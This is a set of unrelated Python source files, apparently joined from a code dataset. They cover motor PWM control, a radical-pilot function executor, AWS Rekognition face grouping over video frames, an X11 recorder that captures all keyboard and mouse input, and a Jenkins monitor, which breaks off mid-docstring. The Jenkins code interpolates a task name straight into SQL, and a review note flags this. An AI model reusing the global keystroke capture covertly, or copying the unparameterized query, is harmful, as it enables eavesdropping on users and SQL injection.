        GPIO.setmode(GPIO.BOARD)
        for pin in (self.right_pwm_pin, self.left_pwm_pin,
                    self.right_pwm_en_1, self.left_pwm_en_1,
                    self.right_pwm_en_2, self.left_pwm_en_2):
            GPIO.setup(pin, GPIO.OUT)

        # 1 kHz PWM on both sides, initially stopped (0% duty)
        self.right_pwm = GPIO.PWM(self.right_pwm_pin, 1000)
        self.right_pwm.start(0)
        self.left_pwm = GPIO.PWM(self.left_pwm_pin, 1000)
        self.left_pwm.start(0)

    def right_pwm_control(self):
        # Worker loop: refresh right direction and duty cycle ~10x/sec.
        while self.isBusy:
            self.direction_right()
            self.right_pwm.ChangeDutyCycle(self.pwm_value_control(self.right_pwm_value))
            sleep(0.1)
        self.close_check()

    def left_pwm_control(self):
        # Worker loop: refresh left direction and duty cycle ~10x/sec.
        while self.isBusy:
            self.direction_left()
            self.left_pwm.ChangeDutyCycle(self.pwm_value_control(self.left_pwm_value))
            sleep(0.1)
        self.close_check()

    def pwm_value_control(self, pwm_value):
        """Clamp a requested duty cycle into the valid 0-100 range."""
        return max(0, min(100, pwm_value))

    def direction_right(self):
        # Drive the right H-bridge enable pins for the requested direction.
        if self.car_direction_right:
            levels = (GPIO.HIGH, GPIO.LOW)   # forward
        else:
            levels = (GPIO.LOW, GPIO.HIGH)   # reverse
        GPIO.output(self.right_pwm_en_1, levels[0])
        GPIO.output(self.right_pwm_en_2, levels[1])

    def direction_left(self):
        # Drive the left H-bridge enable pins for the requested direction.
        if self.car_direction_left:
            levels = (GPIO.HIGH, GPIO.LOW)   # forward
        else:
            levels = (GPIO.LOW, GPIO.HIGH)   # reverse
        GPIO.output(self.left_pwm_en_1, levels[0])
        GPIO.output(self.left_pwm_en_2, levels[1])

    def close_check(self):
        """Release the GPIO only once both worker threads have exited."""
        self.isClose = self.isClose + 1
        if (self.isClose == 2):
            GPIO.cleanup()
            print("Closed")

    def run(self):
        """Start both PWM worker threads."""
        Thread(target=self.right_pwm_control).start()
        Thread(target=self.left_pwm_control).start()
|
funcs.py |
__copyright__ = "Copyright 2013-2016, http://radical.rutgers.edu"
__license__ = "MIT"
import os
import copy
import stat
import time
import Queue
import signal
import tempfile
import threading
import traceback
import subprocess
import radical.utils as ru
from .... import pilot as rp
from ... import utils as rpu
from ... import states as rps
from ... import constants as rpc
from .base import AgentExecutingComponent
# ==============================================================================
#
class FUNCS(AgentExecutingComponent) :
    """Executing component for 'function' compute units (FUNC tasks).

    Instead of spawning one process per unit, it launches one long-lived
    func-executor per node and exchanges units/results with them via two
    queue bridges ('funcs_wrk_queue' / 'funcs_res_queue').

    NOTE(review): Python 2 era code (`Queue` module, `iteritems()`); it
    will not run unmodified under Python 3.
    """

    # --------------------------------------------------------------------------
    #
    def __init__(self, cfg, session):

        AgentExecutingComponent.__init__ (self, cfg, session)

        self._collector = None                # result-collector thread
        self._terminate = threading.Event()   # signals the collector to stop

    # --------------------------------------------------------------------------
    #
    def initialize_child(self):
        """Register component I/O, connect the func queues, and launch one
        func executor process on every node of the allocation."""

        self._pwd = os.getcwd()
        self.gtod = "%s/gtod" % self._pwd   # gettimeofday helper for profiling

        self.register_input(rps.AGENT_EXECUTING_PENDING,
                            rpc.AGENT_EXECUTING_QUEUE, self.work)

        self.register_output(rps.AGENT_STAGING_OUTPUT_PENDING,
                             rpc.AGENT_STAGING_OUTPUT_QUEUE)

        self.register_publisher (rpc.AGENT_UNSCHEDULE_PUBSUB)
        self.register_subscriber(rpc.CONTROL_PUBSUB, self.command_cb)

        # Bridge endpoints for shipping work to / results from the executors.
        addr_wrk = self._cfg['bridges']['funcs_wrk_queue']
        addr_res = self._cfg['bridges']['funcs_res_queue']

        self._log.debug('=== wrk in addr: %s', addr_wrk['addr_in' ])
        self._log.debug('=== res out addr: %s', addr_res['addr_out'])

        self._funcs_wrk = rpu.Queue(self._session, 'funcs_wrk_queue',
                                    rpu.QUEUE_INPUT, self._cfg,
                                    addr_wrk['addr_in'])
        self._funcs_res = rpu.Queue(self._session, 'funcs_res_queue',
                                    rpu.QUEUE_OUTPUT, self._cfg,
                                    addr_res['addr_out'])

        self._cancel_lock = threading.RLock()
        self._cus_to_cancel = list()
        self._cus_to_watch = list()
        self._watch_queue = Queue.Queue ()

        self._pilot_id = self._cfg['pilot_id']

        # run watcher thread
        self._collector = ru.Thread(target=self._collect, name="Collector")
        self._collector.start()

        # we need to launch the executors on all nodes, and use the
        # agent_launcher for that
        self._launcher = rp.agent.LM.create(
            name = self._cfg.get('agent_launch_method'),
            cfg = self._cfg,
            session = self._session)

        # now run the func launcher on all nodes
        ve = os.environ.get('VIRTUAL_ENV', '')
        exe = ru.which('radical-pilot-agent-funcs')
        if not exe:
            # fall back to the pilot sandbox's rp install
            exe = '%s/rp_install/bin/radical-pilot-agent-funcs' % self._pwd

        for idx, node in enumerate(self._cfg['lrms_info']['node_list']):
            uid = 'func_exec.%04d' % idx
            pwd = '%s/%s' % (self._pwd, uid)
            # Minimal CU-like description: one single-core executor per
            # node, pointed at the far ends of the two queue bridges.
            funcs = {'uid' : uid,
                     'description': {'executable' : exe,
                                     'arguments' : [pwd, ve],
                                     'cpu_processes': 1,
                                     'environment' : [],
                                    },
                     'slots' : {'nodes' : [{'name' : node[0],
                                            'uid' : node[1],
                                            'cores' : [[0]],
                                            'gpus' : []
                                           }]
                               },
                     'cfg' : {'addr_wrk' : addr_wrk['addr_out'],
                              'addr_res' : addr_res['addr_in']
                             }
                    }
            self._spawn(self._launcher, funcs)

    # --------------------------------------------------------------------------
    #
    def command_cb(self, topic, msg):
        """Handle control messages; record unit cancellation requests."""
        self._log.info('command_cb [%s]: %s', topic, msg)

        cmd = msg['cmd']
        arg = msg['arg']

        if cmd == 'cancel_units':
            self._log.info("cancel_units command (%s)" % arg)
            with self._cancel_lock:
                self._cus_to_cancel.extend(arg['uids'])

        return True

    # --------------------------------------------------------------------------
    #
    def _spawn(self, launcher, funcs):
        """Write a launch script for one func executor and start it."""

        # NOTE: see documentation of funcs['sandbox'] semantics in the ComputeUnit
        # class definition.
        sandbox = '%s/%s' % (self._pwd, funcs['uid'])
        fname = '%s/%s.sh' % (sandbox, funcs['uid'])
        cfgname = '%s/%s.cfg' % (sandbox, funcs['uid'])
        descr = funcs['description']

        rpu.rec_makedir(sandbox)
        ru.write_json(funcs.get('cfg'), cfgname)

        launch_cmd, hop_cmd = launcher.construct_command(funcs, fname)

        if hop_cmd : cmdline = hop_cmd
        else : cmdline = fname

        with open(fname, "w") as fout:
            fout.write('#!/bin/sh\n\n')
            # Create string for environment variable setting
            fout.write('export RP_SESSION_ID="%s"\n' % self._cfg['session_id'])
            fout.write('export RP_PILOT_ID="%s"\n' % self._cfg['pilot_id'])
            fout.write('export RP_AGENT_ID="%s"\n' % self._cfg['agent_name'])
            fout.write('export RP_SPAWNER_ID="%s"\n' % self.uid)
            fout.write('export RP_FUNCS_ID="%s"\n' % funcs['uid'])
            fout.write('export RP_GTOD="%s"\n' % self.gtod)
            # NOTE(review): self._cu_tmp is never set in this class —
            # presumably provided by the base class; otherwise this raises
            # AttributeError. Verify.
            fout.write('export RP_TMP="%s"\n' % self._cu_tmp)

            # also add any env vars requested in the unit description
            if descr.get('environment', []):
                # NOTE(review): iteritems() is Python 2 only
                for key,val in descr['environment'].iteritems():
                    fout.write('export "%s=%s"\n' % (key, val))

            fout.write('\n%s\n\n' % launch_cmd)
            fout.write('RETVAL=$?\n')
            fout.write("exit $RETVAL\n")

        # done writing to launch script, get it ready for execution.
        st = os.stat(fname)
        os.chmod(fname, st.st_mode | stat.S_IEXEC)

        # prepare stdout/stderr
        stdout_file = descr.get('stdout') or 'STDOUT'
        stderr_file = descr.get('stderr') or 'STDERR'

        fout = open('%s/%s.out' % (sandbox, funcs['uid']), "w")
        ferr = open('%s/%s.err' % (sandbox, funcs['uid']), "w")

        self._prof.prof('exec_start', uid=funcs['uid'])
        funcs['proc'] = subprocess.Popen(args = cmdline,
                                         executable = None,
                                         stdin = None,
                                         stdout = fout,
                                         stderr = ferr,
                                         preexec_fn = os.setsid,
                                         close_fds = True,
                                         shell = True,
                                         cwd = sandbox)
        self._prof.prof('exec_ok', uid=funcs['uid'])

    # --------------------------------------------------------------------------
    #
    def work(self, units):
        """Forward incoming FUNC units to the executors' work queue."""

        if not isinstance(units, list):
            units = [units]

        self.advance(units, rps.AGENT_EXECUTING, publish=True, push=False)

        for unit in units:
            # this component only handles function-type units
            assert(unit['description']['cpu_process_type'] == 'FUNC')
            self._funcs_wrk.put(unit)

    # --------------------------------------------------------------------------
    #
    def _collect(self):
        """Collector loop: pull finished units off the result queue and
        advance them toward output staging."""
        while not self._terminate.is_set():

            # pull units from "funcs_out_queue"
            units = self._funcs_res.get_nowait(1000)

            if units:
                for unit in units:
                    unit['target_state'] = unit['state']
                    unit['pilot'] = self._pilot_id
                    self._log.debug('=== got %s [%s] [%s] [%s]',
                                    unit['uid'], unit['state'],
                                    unit['stdout'], unit['stderr'])
                self.advance(units, rps.AGENT_STAGING_OUTPUT_PENDING,
                             publish=True, push=True)
            else:
                # nothing pending — back off briefly
                time.sleep(0.1)
# ------------------------------------------------------------------------------
|
VidLambdaFaceMatch.py | """
Code and comments derived from:
https://aws.amazon.com/blogs/machine-learning/find-distinct-people-in-a-video-with-amazon-rekognition/
Accessed 2018-09-10
"""
"""
LAMBDA ONE: Processes video into thumbnail frames for AWS Rekognition index_faces command
"""
# Retrieve the key for the S3 object that caused this function to be triggered
# (NOTE(review): urllib.unquote_plus is Python 2; Python 3 uses
# urllib.parse.unquote_plus)
key = urllib.unquote_plus(event['Records'][0]['s3']['object']['key'].encode('utf8'))
filename = key.split('/')[-1]

# Create a new transcoding job. Files created by Elastic Transcoder start with 'elastictranscoder/[filename]/[timestamp]_'
timestamp = datetime.utcnow().strftime('%Y-%m-%d_%H-%M-%S')
client = boto3.client('elastictranscoder')
response = client.create_job(
    PipelineId=os.environ['PipelineId'],   # Elastic Transcoder pipeline to use
    Input={'Key': key},
    OutputKeyPrefix='elastictranscoder/{}/{}_'.format(filename, timestamp),
    Output={
        'Key': 'transcoded-video.mp4',
        # {count} is expanded by Elastic Transcoder to a frame counter;
        # later code parses a 5-digit number out of each thumbnail key.
        'ThumbnailPattern': 'thumbnail-{count}',
        'PresetId': os.environ['PresetId']
    }
)
"""
LAMBDA TWO: Creates a new collection in Amazon Rekognition.
"""
"""
2.A Calls the IndexFaces operation for each thumbnail. The solution uses concurrent
threads to increase the throughput of requests to Amazon Rekognition and to reduce
the time needed to complete the operation. In the end, the collection contains as
many faces as there are faces detected in each thumbnail.
"""
# Create a new collection. I use the job ID for the name of the collection
collectionId = sns_msg['jobId']
rekognition.create_collection(CollectionId=collectionId)

# Retrieve the list of thumbnail objects in the S3 bucket
thumbnailKeys = []
prefix = sns_msg['outputKeyPrefix']
prefix += sns_msg['outputs'][0]['thumbnailPattern'].replace('{count}', '')
paginator = s3.get_paginator('list_objects')
response_iterator = paginator.paginate(
    Bucket=os.environ['Bucket'],
    Prefix=prefix
)
for page in response_iterator:
    # NOTE(review): 'Contents' is absent on empty pages — this raises
    # KeyError if no thumbnails match the prefix.
    thumbnailKeys += [i['Key'] for i in page['Contents']]

# Call the IndexFaces operation for each thumbnail
faces = {}                     # FaceId -> {'FrameNumber', 'BoundingBox', ...}
indexFacesQueue = Queue()      # work queue shared with the indexing threads
def index_faces_worker():
    """Daemon worker: index the faces found in thumbnail keys pulled off
    indexFacesQueue, accumulating results in the shared `faces` dict.

    On failure the key is requeued so the thumbnail is retried.
    """
    rekognition = boto3.client('rekognition', region_name=os.environ['AWS_REGION'])
    while True:
        key = indexFacesQueue.get()
        try:
            # The frame number is the 5-digit counter just before the file
            # extension (thumbnail-NNNNN.ext).
            # BUG FIX: this must be computed *before* the IndexFaces call,
            # which passes it as ExternalImageId; the original referenced
            # frameNumber before assignment, so every iteration raised
            # UnboundLocalError, was swallowed by the bare except, and the
            # key was requeued forever.
            frameNumber = int(key[:-4][-5:])
            response = rekognition.index_faces(
                CollectionId=collectionId,
                Image={'S3Object': {
                    'Bucket': os.environ['Bucket'],
                    'Name': key
                }},
                ExternalImageId=str(frameNumber)
            )
            # Store information about returned faces in a local variable
            for face in response['FaceRecords']:
                faceId = face['Face']['FaceId']
                faces[faceId] = {
                    'FrameNumber': frameNumber,
                    'BoundingBox': face['Face']['BoundingBox']
                }
        # Put the key back in the queue if the IndexFaces operation failed
        # (narrowed from a bare except so KeyboardInterrupt etc. propagate)
        except Exception:
            indexFacesQueue.put(key)
        indexFacesQueue.task_done()
# Fan the IndexFaces calls out across CONCURRENT_THREADS daemon workers.
for _ in range(CONCURRENT_THREADS):
    worker = Thread(target=index_faces_worker)
    worker.daemon = True
    worker.start()

# Enqueue every thumbnail, then block until the queue is fully drained.
for key in thumbnailKeys:
    indexFacesQueue.put(key)
indexFacesQueue.join()
"""
2.B For each face stored in the collection, calls the SearchFaces operation to
search for faces that are similar to that face and in which it has a confidence
in the match that is higher than 97%.
"""
searchFacesQueue = Queue()

def search_faces_worker():
    """Daemon worker: find collection matches (>=97% confidence) for each
    FaceId pulled off searchFacesQueue; faces without matches are dropped."""
    rekognition = boto3.client('rekognition', region_name=os.environ['AWS_REGION'])
    while True:
        faceId = searchFacesQueue.get()
        try:
            response = rekognition.search_faces(
                CollectionId=collectionId,
                FaceId=faceId,
                FaceMatchThreshold=97,
                MaxFaces=256
            )
            matchingFaces = [match['Face']['FaceId'] for match in response['FaceMatches']]
            if matchingFaces:
                faces[faceId]['MatchingFaces'] = matchingFaces
            else:
                # A face matching nothing cannot belong to a tracked person.
                del faces[faceId]
        except:
            # Requeue on failure (e.g. API throttling) so the face is retried.
            searchFacesQueue.put(faceId)
        searchFacesQueue.task_done()

for _ in range(CONCURRENT_THREADS):
    worker = Thread(target=search_faces_worker)
    worker.daemon = True
    worker.start()

for faceId in list(faces):
    searchFacesQueue.put(faceId)
searchFacesQueue.join()
"""
2.C Find faces in the collection that match each face that it detected. It starts
from the first face that appears in the video and associates that face with a
peopleId of 1. Then, it recursively propagates the peopleId to the matching faces.
In other words, if faceA matches faceB and faceB matches faceC, the function decides
that faceA, faceB and faceC correspond to the same person and assigns them all
the same peopleId. To avoid false positives, the Lambda function propagates the
peopleId from faceA to faceB only if there are at least two faces that match faceB
that also match faceA. When the peopleId 1 has fully propagated, the function associates
a peopleId of 2 to the next face appearing in the video that has no peopleId associated with it.
It continues this process until all of the faces have a peopleId.
"""
# Sort the list of faces in the order of which they appear in the video
def getKey(pair):
    """Sort key: the frame number in a (faceId, frameNumber) pair."""
    return pair[1]
# Map each face to its frame of first appearance, then order FaceIds by
# that frame so people get numbered in order of appearance.
facesFrameNumber = {face_id: info['FrameNumber'] for face_id, info in faces.items()}
faceIdsSorted = [face_id for face_id, _ in sorted(facesFrameNumber.items(), key=getKey)]
# Identify unique people and detect the frames in which they appear
def propagate_person_id(faceId):
    """Spread faces[faceId]'s PersonId to all transitively matching faces.

    A PersonId propagates from face A to an unlabeled matching face B only
    when at least two of B's matches also match A — this guards against a
    single false-positive match chaining unrelated people together.

    Implemented with an explicit work stack instead of recursion: the
    original recursed once per propagated face, which can exceed the
    interpreter recursion limit on videos with many frames of one person.
    The propagation condition is monotone (it depends only on static match
    lists and on whether a face is already labeled), so the resulting
    fixpoint is identical regardless of traversal order.
    """
    pending = [faceId]
    while pending:
        current = pending.pop()
        for matchingId in faces[current]['MatchingFaces']:
            if 'PersonId' in faces[matchingId]:
                continue
            # Count mutual matches between `current` and the candidate.
            numberMatchingLoops = 0
            for matchingId2 in faces[matchingId]['MatchingFaces']:
                if current in faces[matchingId2]['MatchingFaces']:
                    numberMatchingLoops = numberMatchingLoops + 1
            if numberMatchingLoops >= 2:
                faces[matchingId]['PersonId'] = faces[current]['PersonId']
                pending.append(matchingId)
# Walk faces in order of appearance; each still-unlabeled face starts a
# new person and propagates its id to its transitive matches.
personId = 0
for faceId in faceIdsSorted:
    if 'PersonId' not in faces[faceId]:
        personId = personId + 1
        faces[faceId]['PersonId'] = personId
        propagate_person_id(faceId)
|
linux_recorder.py | from sneakysnek.recorder import Recorder
from sneakysnek.keyboard_keys import KeyboardKey
from sneakysnek.mouse_buttons import MouseButton
from sneakysnek.keyboard_event import KeyboardEvent, KeyboardEvents
from sneakysnek.mouse_event import MouseEvent, MouseEvents
import threading
import Xlib.display
import Xlib.ext
import Xlib.X
import Xlib.XK
import Xlib.protocol.rq
class LinuxRecorder(Recorder):
    """X11 recorder backend: captures global keyboard/mouse activity via
    the XRecord extension and forwards it to *callback* as KeyboardEvent /
    MouseEvent objects."""

    def __init__(self, callback):
        self.callback = callback
        self.is_recording = False
        self.thread = None

        # Separate connections: record_enable_context() blocks its
        # connection, so each record context gets a dedicated Display and
        # a third 'local' one is kept free for lookups and control.
        self.display_local = Xlib.display.Display()
        self.display_record_keyboard = Xlib.display.Display()
        self.display_record_mouse = Xlib.display.Display()

        self.keyboard_context = None
        self.mouse_context = None

        self.keyboard_event_thread = None
        self.mouse_event_thread = None

    def start(self):
        """Create both XRecord contexts and start one daemon thread each."""
        self.is_recording = True

        self.keyboard_context = self._initialize_keyboard_context()
        self.mouse_context = self._initialize_mouse_context()

        self.keyboard_event_thread = threading.Thread(target=self.start_keyboard_recording, args=())
        self.keyboard_event_thread.daemon = True
        self.keyboard_event_thread.start()

        self.mouse_event_thread = threading.Thread(target=self.start_mouse_recording, args=())
        self.mouse_event_thread.daemon = True
        self.mouse_event_thread.start()

    def start_keyboard_recording(self):
        # Blocks until the context is disabled from another connection.
        self.display_record_keyboard.record_enable_context(
            self.keyboard_context,
            lambda r: self.event_handler(self.display_record_keyboard, r)
        )
        self.display_record_keyboard.record_free_context(self.keyboard_context)

    def start_mouse_recording(self):
        # Blocks until the context is disabled from another connection.
        self.display_record_mouse.record_enable_context(
            self.mouse_context,
            lambda r: self.event_handler(self.display_record_mouse, r)
        )
        self.display_record_mouse.record_free_context(self.mouse_context)

    def stop(self):
        """Disable both record contexts and close all display connections."""
        # Disabling via the separate local connection unblocks the
        # record_enable_context() calls running on the record threads.
        self.display_local.record_disable_context(self.keyboard_context)
        self.display_local.record_disable_context(self.mouse_context)
        self.display_local.flush()

        self.display_record_keyboard.close()
        self.display_record_mouse.close()
        self.display_local.close()

        self.is_recording = False

    def event_handler(self, display, reply):
        """Parse raw XRecord reply data and dispatch events to the callback."""
        data = reply.data
        # One reply can carry several packed events; consume them in order.
        while len(data):
            event, data = Xlib.protocol.rq.EventField(None).parse_binary_value(
                data,
                display.display,
                None,
                None
            )
            if event.type in [Xlib.X.KeyPress, Xlib.X.KeyRelease]:
                # Resolve modifier state to the right keysym group first.
                index = self._shift_to_index(self.display_local, event.state)
                scan_code = self._keycode_to_scan_code(self.display_local, event.detail, index)
                if scan_code in keyboard_scan_code_mapping:
                    keyboard_key = keyboard_scan_code_mapping[scan_code]
                else:
                    # Unmapped key: abandon the rest of this reply.
                    return None
                self.callback(KeyboardEvent(KeyboardEvents.DOWN if event.type == Xlib.X.KeyPress else KeyboardEvents.UP, keyboard_key))
            elif event.type == Xlib.X.ButtonPress:
                if event.detail in mouse_button_mapping:
                    button = mouse_button_mapping[event.detail]
                    x = event.root_x
                    y = event.root_y
                    self.callback(MouseEvent(MouseEvents.CLICK, button=button, direction="DOWN", x=x, y=y))
            elif event.type == Xlib.X.ButtonRelease:
                if event.detail in mouse_button_mapping:
                    button = mouse_button_mapping[event.detail]
                    x = event.root_x
                    y = event.root_y
                    self.callback(MouseEvent(MouseEvents.CLICK, button=button, direction="UP", x=x, y=y))
                # NOTE(review): wheel "buttons" 4/5 are handled only here,
                # on ButtonRelease; their ButtonPress falls through silently
                # above — confirm this is intentional (avoids double scroll
                # events per wheel notch).
                elif event.detail in [4, 5]:
                    direction = "UP" if event.detail == 4 else "DOWN"
                    x = event.root_x
                    y = event.root_y
                    self.callback(MouseEvent(MouseEvents.SCROLL, direction=direction, velocity=1, x=x, y=y))
            elif event.type == Xlib.X.MotionNotify:
                self.callback(MouseEvent(MouseEvents.MOVE, x=event.root_x, y=event.root_y))

    def _initialize_keyboard_context(self):
        """Create an XRecord context delivering KeyPress..KeyRelease events."""
        return self.display_record_keyboard.record_create_context(
            0,
            [Xlib.ext.record.AllClients],
            [{
                'core_requests': (0, 0),
                'core_replies': (0, 0),
                'ext_requests': (0, 0, 0, 0),
                'ext_replies': (0, 0, 0, 0),
                'delivered_events': (0, 0),
                'device_events': (
                    Xlib.X.KeyPress,
                    Xlib.X.KeyRelease
                ),
                'errors': (0, 0),
                'client_started': False,
                'client_died': False,
            }]
        )

    def _initialize_mouse_context(self):
        """Create an XRecord context delivering mouse events.

        NOTE(review): device_events is an event-type *range*; the mask
        constants used here evaluate to (4, 8), which as a range covers
        ButtonPress(4), ButtonRelease(5) and MotionNotify(6). Confirm this
        is intentional rather than listing the event types directly.
        """
        return self.display_record_mouse.record_create_context(
            0,
            [Xlib.ext.record.AllClients],
            [{
                'core_requests': (0, 0),
                'core_replies': (0, 0),
                'ext_requests': (0, 0, 0, 0),
                'ext_replies': (0, 0, 0, 0),
                'delivered_events': (0, 0),
                'device_events': (
                    Xlib.X.ButtonPressMask,
                    Xlib.X.ButtonReleaseMask
                ),
                'errors': (0, 0),
                'client_started': False,
                'client_died': False,
            }]
        )

    def _shift_to_index(self, display, shift):
        # Keysym group index: bit 0 = Shift, bit 1 = AltGr (Mode_switch).
        return ((1 if shift & 1 else 0) + (2 if shift & self._alt_gr_mask(display) else 0))

    def _alt_gr_mask(self, display):
        # NOTE(review): inside a class body "display.__altgr_mask" is
        # name-mangled to "_LinuxRecorder__altgr_mask", but hasattr() checks
        # the literal string "__altgr_mask" — so this cache never hits and
        # the mask is recomputed on every call (still correct, just slower).
        if not hasattr(display, "__altgr_mask"):
            display.__altgr_mask = self._find_mask(display, "Mode_switch")
        return display.__altgr_mask

    def _find_mask(self, display, symbol):
        """Return the modifier bitmask whose mapping contains *symbol*, or 0."""
        modifier_keycode = display.keysym_to_keycode(Xlib.XK.string_to_keysym(symbol))
        for index, keycodes in enumerate(display.get_modifier_mapping()):
            for keycode in keycodes:
                if keycode == modifier_keycode:
                    return 1 << index
        return 0

    def _keycode_to_scan_code(self, display, keycode, index):
        """Resolve keycode+group to a keysym, retrying with simpler groups
        (drop AltGr, then Shift) when the exact group has no binding."""
        scan_code = display.keycode_to_keysym(keycode, index)
        if scan_code:
            return scan_code
        elif index & 0x2:
            return self._keycode_to_scan_code(display, keycode, index & ~0x2)
        elif index & 0x1:
            return self._keycode_to_scan_code(display, keycode, index & ~0x1)
        else:
            return 0

    @classmethod
    def record(cls, callback):
        """Convenience constructor: build a recorder and start it on a
        daemon thread; returns the running recorder."""
        recorder = cls(callback)
        recorder.thread = threading.Thread(target=recorder.start, args=())
        recorder.thread.daemon = True
        recorder.thread.start()
        return recorder
# X11 keysym -> sneakysnek KeyboardKey. The integer keys are the keysym
# values returned by Display.keycode_to_keysym (e.g. 65307 == XK_Escape).
keyboard_scan_code_mapping = {
    65307: KeyboardKey.KEY_ESCAPE,
    65470: KeyboardKey.KEY_F1,
    65471: KeyboardKey.KEY_F2,
    65472: KeyboardKey.KEY_F3,
    65473: KeyboardKey.KEY_F4,
    65474: KeyboardKey.KEY_F5,
    65475: KeyboardKey.KEY_F6,
    65476: KeyboardKey.KEY_F7,
    65477: KeyboardKey.KEY_F8,
    65478: KeyboardKey.KEY_F9,
    65479: KeyboardKey.KEY_F10,
    65480: KeyboardKey.KEY_F11,
    65481: KeyboardKey.KEY_F12,
    65377: KeyboardKey.KEY_PRINT_SCREEN,
    65300: KeyboardKey.KEY_SCROLL_LOCK,
    65299: KeyboardKey.KEY_PAUSE,
    96: KeyboardKey.KEY_GRAVE,
    49: KeyboardKey.KEY_1,
    50: KeyboardKey.KEY_2,
    51: KeyboardKey.KEY_3,
    52: KeyboardKey.KEY_4,
    53: KeyboardKey.KEY_5,
    54: KeyboardKey.KEY_6,
    55: KeyboardKey.KEY_7,
    56: KeyboardKey.KEY_8,
    57: KeyboardKey.KEY_9,
    48: KeyboardKey.KEY_0,
    45: KeyboardKey.KEY_MINUS,
    61: KeyboardKey.KEY_EQUALS,
    65288: KeyboardKey.KEY_BACKSPACE,
    65379: KeyboardKey.KEY_INSERT,
    65360: KeyboardKey.KEY_HOME,
    65365: KeyboardKey.KEY_PAGE_UP,
    65407: KeyboardKey.KEY_NUMLOCK,
    65455: KeyboardKey.KEY_NUMPAD_DIVIDE,
    65450: KeyboardKey.KEY_NUMPAD_MULTIPLY,
    65453: KeyboardKey.KEY_NUMPAD_SUBTRACT,
    65289: KeyboardKey.KEY_TAB,
    113: KeyboardKey.KEY_Q,
    119: KeyboardKey.KEY_W,
    101: KeyboardKey.KEY_E,
    114: KeyboardKey.KEY_R,
    116: KeyboardKey.KEY_T,
    121: KeyboardKey.KEY_Y,
    117: KeyboardKey.KEY_U,
    105: KeyboardKey.KEY_I,
    111: KeyboardKey.KEY_O,
    112: KeyboardKey.KEY_P,
    91: KeyboardKey.KEY_LEFT_BRACKET,
    93: KeyboardKey.KEY_RIGHT_BRACKET,
    92: KeyboardKey.KEY_BACKSLASH,
    65535: KeyboardKey.KEY_DELETE,
    65367: KeyboardKey.KEY_END,
    65366: KeyboardKey.KEY_PAGE_DOWN,
    65429: KeyboardKey.KEY_NUMPAD_7,
    65431: KeyboardKey.KEY_NUMPAD_8,
    65434: KeyboardKey.KEY_NUMPAD_9,
    65451: KeyboardKey.KEY_NUMPAD_ADD,
    65509: KeyboardKey.KEY_CAPSLOCK,
    97: KeyboardKey.KEY_A,
    115: KeyboardKey.KEY_S,
    100: KeyboardKey.KEY_D,
    102: KeyboardKey.KEY_F,
    103: KeyboardKey.KEY_G,
    104: KeyboardKey.KEY_H,
    106: KeyboardKey.KEY_J,
    107: KeyboardKey.KEY_K,
    108: KeyboardKey.KEY_L,
    59: KeyboardKey.KEY_SEMICOLON,
    39: KeyboardKey.KEY_APOSTROPHE,
    65293: KeyboardKey.KEY_RETURN,
    65430: KeyboardKey.KEY_NUMPAD_4,
    65437: KeyboardKey.KEY_NUMPAD_5,
    65432: KeyboardKey.KEY_NUMPAD_6,
    65505: KeyboardKey.KEY_LEFT_SHIFT,
    122: KeyboardKey.KEY_Z,
    120: KeyboardKey.KEY_X,
    99: KeyboardKey.KEY_C,
    118: KeyboardKey.KEY_V,
    98: KeyboardKey.KEY_B,
    110: KeyboardKey.KEY_N,
    109: KeyboardKey.KEY_M,
    44: KeyboardKey.KEY_COMMA,
    46: KeyboardKey.KEY_PERIOD,
    47: KeyboardKey.KEY_SLASH,
    65506: KeyboardKey.KEY_RIGHT_SHIFT,
    65362: KeyboardKey.KEY_UP,
    65436: KeyboardKey.KEY_NUMPAD_1,
    65433: KeyboardKey.KEY_NUMPAD_2,
    65435: KeyboardKey.KEY_NUMPAD_3,
    65421: KeyboardKey.KEY_NUMPAD_RETURN,
    65507: KeyboardKey.KEY_LEFT_CTRL,
    65513: KeyboardKey.KEY_LEFT_ALT,
    32: KeyboardKey.KEY_SPACE,
    65514: KeyboardKey.KEY_RIGHT_ALT,
    65508: KeyboardKey.KEY_RIGHT_CTRL,
    65361: KeyboardKey.KEY_LEFT,
    65364: KeyboardKey.KEY_DOWN,
    65363: KeyboardKey.KEY_RIGHT,
    65438: KeyboardKey.KEY_NUMPAD_0,
    65439: KeyboardKey.KEY_NUMPAD_PERIOD,
    65515: KeyboardKey.KEY_LEFT_WINDOWS,
    65516: KeyboardKey.KEY_RIGHT_WINDOWS
}

# X11 core button number -> MouseButton (4/5 are the scroll wheel and are
# handled separately in event_handler).
mouse_button_mapping = {
    1 : MouseButton.LEFT,
    2 : MouseButton.MIDDLE,
    3 : MouseButton.RIGHT
}
jenkins_monitor.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import json
import requests
from datetime import datetime
import pymysql
import csv
import codecs
import time
import threading
from abc import abstractmethod
from mysql import Pymysql
from jenkins_common import JenkinsJob
# pylint: disable=E0401
root = os.path.join(os.path.dirname(os.path.abspath(__file__)), '..')
sys.path.insert(0, root)
from common.logger import logger
class DataInterface(object):
    '''
    Interface for communicating data between Jenkins monitors and a
    backend (e.g. a database). Monitor tasks call these methods; a
    concrete backend must implement them.
    '''
    @abstractmethod
    def require_data(self, type=None, **kwargs):
        '''
        params:
            type: data type; a concrete monitor task uses this type to
                  select which data to require.
                  (NOTE: the name shadows the builtin `type`, kept for
                  interface compatibility.)
        '''
        raise NotImplementedError

    @abstractmethod
    def publish_result(self, data, **kwargs):
        # Push a task's result `data` to the backend.
        raise NotImplementedError
class JenkinsMonitorTbl(object):
    '''
    Jenkins monitor table: loads the monitoring configuration from the DB.

    items format: ((url_1, user_1, passwd_1, job_1), (url_2, user_2, passwd_2, job_2),)
    '''
    def __init__(self, task_name=None):
        # task_name: optional filter — load only rows of this monitor task
        self.db = Pymysql()
        # ((jenkins_id, jobs_id),)
        self.monitor_task = self._retrieve_data(task_name)

    def _retrieve_data(self, task_name):
        # Join the monitor config rows with Jenkins credentials and job names.
        sql = "SELECT jenkins.url, jenkins.user, jenkins.passwd, job.job \
               FROM crt_jenkins_monitor AS m, crt_jenkins_info AS jenkins, crt_jenkins_job AS job \
               WHERE m.jenkins_id = jenkins.id AND m.job_id = job.id"
        if task_name:
            # NOTE(review): task_name is interpolated directly into the SQL;
            # safe only while it comes from trusted callers — confirm.
            sql += r" and task = '{}'".format(task_name)
        logger.debug(sql)
        monitor_task = self.db.get_DB(sql)
        logger.debug(monitor_task)
        return monitor_task

    @property
    def items(self):
        # Raw row tuples fetched at construction time.
        return self.monitor_task
class JenkinsMonitorTask(object):
    '''
    Base class for a Jenkins job monitoring task.

